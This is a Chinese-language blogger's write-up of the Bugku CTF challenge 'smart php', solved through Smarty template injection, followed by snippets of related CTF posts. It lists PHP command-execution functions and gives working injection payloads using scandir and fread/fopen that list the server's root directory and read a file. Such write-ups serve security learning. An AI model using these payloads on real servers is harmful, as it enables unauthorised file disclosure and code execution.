1:打开环境,翻译看看意思,随便传一个参数如图,随意传参获取到smarty提示,有可能是模板注入

2:审计一下代码,preg_match后面就是代表这些被过滤了,环境地质+./template.html就是假的答案,就想到了抓包看看

还是看了别人的才知道个东西叫模板注入,要验证一下是不是模板注入,像这样,114.67.175.224:18407/?flag.txt?a={4*4}里面的4*4随便你,后面代码后面会多出一个像这样的

3:构造payload

补充

php命令执行函数有https://www.php.net/execexec — 执行一个外部程序
passthru — 执行外部程序并且显示原始输出
proc_close — 关闭由 proc_open 打开的进程并且返回进程退出码
proc_open — 执行一个命令,并且打开用来输入/输出的文件指针。
popen — 打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。
proc_terminate — 杀除由 proc_open 打开的进程
shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。
system — 执行外部程序,并且显示输出
scandir 列出指定路径中的文件和目录
eval — 把字符串作为PHP代码执行
assert --函数直接将传入的参数当成PHP代码执行
linux查看文件的命令cat tac more less head tail nl static-sh paste od bzmore bzless
php文件读取函数printr() fread() fgets() vardump()

用scandir函数去查找关于flag的文件,还有获取flag文件内容:/index.php?f={print_r(scandir("/"))}

 /index.php?f={var_dump(scandir("/"))},发现重要东西,_12686这个文件夹名字就不一样了,先搞它

 在后面粘贴上,/index.php?f={fread(fopen("/_12686","r"),4096)}

4096是啥,我也不晓得

 得到flag

4:呃呃呃4096是什么,速度?看到博客的,知道的,qql告诉我吧

PHP中的文件系统函数第三部分_瑾的日常-CSDN博客

还有一个大佬的博客,我就是看了·他的payload我才做出来

bugku CTF 聪明的php WriteUp - 知乎 (zhihu.com)

bugku上聪明的PHP相关推荐

  1. Bugku web 聪明的php

    Bugku web 聪明的php 模板注入 打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为sm ...

  2. bugku上Snowfall解题过程

    MISC的Snowfall解题过程: 刚看到打开人直接傻掉,翻译一下暴风雪???什么鬼题,有没有一样这样想的 1:先看两个txt名字,告诉了步骤1,步2,所以肯定这个有用,给个网站: Whitelip ...

  3. Bugku之聪明的小羊

    题目给了描述 一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0} 根据提示,fa{fe13f590lg6d46d0d0}应该是栅栏密码,到网上找工具 栅栏加密/解密 - Bugku ...

  4. bugku上美丽的烟火解题过程

    1: 下载好一个压缩包,里面一个密码txt,一个png,解压提示要密码,爆破了一下没有用,打开winhex看一下,发现重要东西!  属于是伪加密 点上面那个HEX搜50 4B 01 02这种,懒直接滑 ...

  5. bugku(crypto)-聪明的小羊

    一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0} flag{6fde4163df05d900}

  6. Bugku 杂项(三)

    这周接着扳bugku上的题,话说暑假真的好无聊啊╯︿╰,希望赶紧开学... 1.旋转跳跃 这题没啥难度,就是考会不会用 MP3Stego这个工具:放个福利吧,为了让更多的小白免受找工具之苦 下载地址: ...

  7. BugKu社工-进阶收集

    学习目标:MISC的简单学习 BugKu社工-进阶收集 学习目标:MISC的简单学习 1.题目 一.提 示: flag{小美小区名字拼音} 二.描 述: 小明当年为了追求小美想尽办法获得小美的地址.直 ...

  8. bugku 网站被黑(御剑突破+bp抓包爆破)

    今天我们写一道bugku上的网站被黑,首先我们启动场景,发现网站被挂了黑页,这种时候,我们开启御剑进行后台扫描,如下图所示 我们从中看到了shell.php,我们点进去,发现了一个后门 我们尝试输入密 ...

  9. BugKu msic方向 赛博朋克

    因为最近在自学msic 所以做的题都是Bugku上msic方向的 这题下载压缩包打开是一个txt,但是里面都是乱码.但是开头有ng字样,猜测是不是一个png文件改成了后缀txt. 打开Hex Work ...

最新文章

  1. android列表勾选框,android listview实现复选框列表
  2. pyspider爬虫学习-文档翻译-About-Projects.md
  3. javascript案例练习
  4. java thumbnails 中心点_java Thumbnails 图片处理的使用
  5. k8s之pod管理(控制器)
  6. Link Cut Tree学习笔记
  7. HDU1850(Nim游戏)
  8. 一发工资就全部取出,会对银行流水有影响吗?
  9. 服务器pg信号指的是什么信号,关于atx电源PG信号检测和分析
  10. 2019 高考填报志愿建议
  11. 在Service中发送广播被kill掉的Activity能不能收到?
  12. hdu2243考研路茫茫——单词情结
  13. 为什么本地图片都不能直接浏览器_抖音精选答疑解惑!你的视频为什么不能被下载?...
  14. .net 创建计划任务开机后自动以管理员身份启动运行 win7 ~ win10
  15. 【pytorch目标检测】FPN网络结构
  16. 梅小雨20190919-5 代码规范,结对
  17. Linux 入门必备命令
  18. 跨语言词嵌入模型调研报告
  19. JAVA打开PDF文件
  20. Kali使用apt-cache search搜索想要的软件包

热门文章

  1. 十一、通过六个因素对织物起球等级进行预测
  2. Mac上免费epub阅读器推荐
  3. 市场调研报告-全球与中国过程文档软件市场现状及未来发展趋势
  4. 二叉树 奇偶行输出方向相反_二叉树中的奇偶级差
  5. python爬虫《丹麦女孩》的影评并分析
  6. Linux安全加固-密码安全配置
  7. win10移动热点问题
  8. mysql入门题库:(1)数据库50题
  9. Take a glance of Firefox extension(火狐狸扩展插件一瞥)
  10. Nginx+内网穿透 访问时404 进不去控制器 出现Nginx404